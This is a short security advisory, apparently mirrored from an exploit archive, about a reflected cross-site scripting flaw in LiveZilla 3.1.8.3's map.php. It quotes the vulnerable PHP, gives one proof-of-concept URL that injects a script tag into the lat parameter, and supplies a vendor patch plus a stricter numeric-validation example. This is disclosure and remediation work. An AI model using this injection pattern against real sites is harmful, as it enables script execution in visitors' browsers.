ID 1337DAY-ID-10523 Type zdt Reporter MaXe Modified 2009-12-30T00:00:00
Description
Exploit for unknown platform in category web applications
====================================
LiveZilla v3.1.8.3 XSS Vulnerability
====================================

Info:
LiveZilla, the Next Generation Live Help / Live Chat and Live
Support System connects you to your website visitors. Use
LiveZilla to provide Live Chats and monitor your website visitors
in real-time. Convert visitors to customers - with LiveZilla!

Credits: InterN0T

External Links:
http://www.livezilla.net/


-:: The Advisory ::-
Together, the following two files are vulnerable to Cross Site Scripting:
map.php substitutes the lat, lng and zom request parameters, unescaped,
into the JavaScript in map.tpl.

1. livezilla/templates/map.tpl (lines 18-20)
var default_lat = <!--dlat-->;
var default_lng = <!--dlng-->;
var default_zom = <!--dzom-->;

2. livezilla/map.php (lines 15-28)
if(isset($_GET["lat"]))
    $map = str_replace("<!--dlat-->",$_GET["lat"],$map);
else
    $map = str_replace("<!--dlat-->","25",$map);

if(isset($_GET["lng"]))
    $map = str_replace("<!--dlng-->",$_GET["lng"],$map);
else
    $map = str_replace("<!--dlng-->","10",$map);

if(isset($_GET["zom"]))
    $map = str_replace("<!--dzom-->",$_GET["zom"],$map);
else
    $map = str_replace("<!--dzom-->","1",$map);


Proof of Concept: (</script>)
http://localhost/livezilla/map.php?lat=%3C/script%3E%3Cscript%3Ealert(%22InterN0T.net%22)%3C/script%3E

Pseudo Proof of Concept:
- JavaScript functions could also have been executed inside the JavaScript where the vulnerable code is.


-:: Solution ::-
The following patch was supplied to the vendor:

1. livezilla/templates/map.tpl (lines 18-20)
var default_lat = "<!--dlat-->";
var default_lng = "<!--dlng-->";
var default_zom = "<!--dzom-->";

2. livezilla/map.php (lines 15-28)
if(isset($_GET["lat"]))
    $map = str_replace("<!--dlat-->",htmlentities($_GET["lat"]),$map);
else
    $map = str_replace("<!--dlat-->","25",$map);

if(isset($_GET["lng"]))
    $map = str_replace("<!--dlng-->",htmlentities($_GET["lng"]),$map);
else
    $map = str_replace("<!--dlng-->","10",$map);

if(isset($_GET["zom"]))
    $map = str_replace("<!--dzom-->",htmlentities($_GET["zom"]),$map);
else
    $map = str_replace("<!--dzom-->","1",$map);

We used htmlentities() since we thought that would be the best
solution. The other functions, htmlspecialchars(), urlencode()
and rawurlencode(), could have been alternatives to the above.
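
A stricter variant of the fix, as an added example that is not part of the original advisory or of LiveZilla's code: because lat, lng and zom are numeric map settings, each can be validated as a number and replaced by the default from map.php (25, 10, 1) when it is not, so no request text reaches the script block at all. The function names map_number() and render_map() and the accepted zoom range are assumptions made for illustration.

```php
<?php
// Added example, not LiveZilla code. The function names and the zoom range
// are assumptions; 25, 10 and 1 are the fallback values used in map.php.

// Return $query[$key] as a numeric literal, or $default when the value is
// missing, not a number, or outside [$min, $max].
function map_number(array $query, string $key, float $min, float $max,
                    string $default, bool $integer = false): string
{
    $raw = $query[$key] ?? null;
    if (!is_string($raw)) {           // absent, or an array such as lat[]=1
        return $default;
    }
    $value = filter_var($raw, $integer ? FILTER_VALIDATE_INT : FILTER_VALIDATE_FLOAT);
    // Written as a negation so that NAN, which fails every comparison, is rejected.
    if ($value === false || !($value >= $min && $value <= $max)) {
        return $default;
    }
    // Emit only digits, sign and decimal point, independent of locale.
    return $integer ? (string) $value : number_format($value, 6, '.', '');
}

// Fill the three placeholders of map.tpl with validated numbers only.
function render_map(string $template, array $query): string
{
    return str_replace(
        ['<!--dlat-->', '<!--dlng-->', '<!--dzom-->'],
        [
            map_number($query, 'lat', -90.0, 90.0, '25'),
            map_number($query, 'lng', -180.0, 180.0, '10'),
            map_number($query, 'zom', 0.0, 21.0, '1', true),  // zoom range assumed
        ],
        $template
    );
}

// Constructed stand-in for lines 18-20 of templates/map.tpl.
$template = "var default_lat = <!--dlat-->;\n"
          . "var default_lng = <!--dlng-->;\n"
          . "var default_zom = <!--dzom-->;\n";

// Constructed request: lat is not a number, lng and zom are valid.
$query = ['lat' => '</script>', 'lng' => '12.5', 'zom' => '4'];

echo render_map($template, $query);
```

The substituted values are valid numeric literals whether or not the template quotes the placeholders, so the check works with either form of map.tpl shown above.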
# 0day.today [2018-01-09] #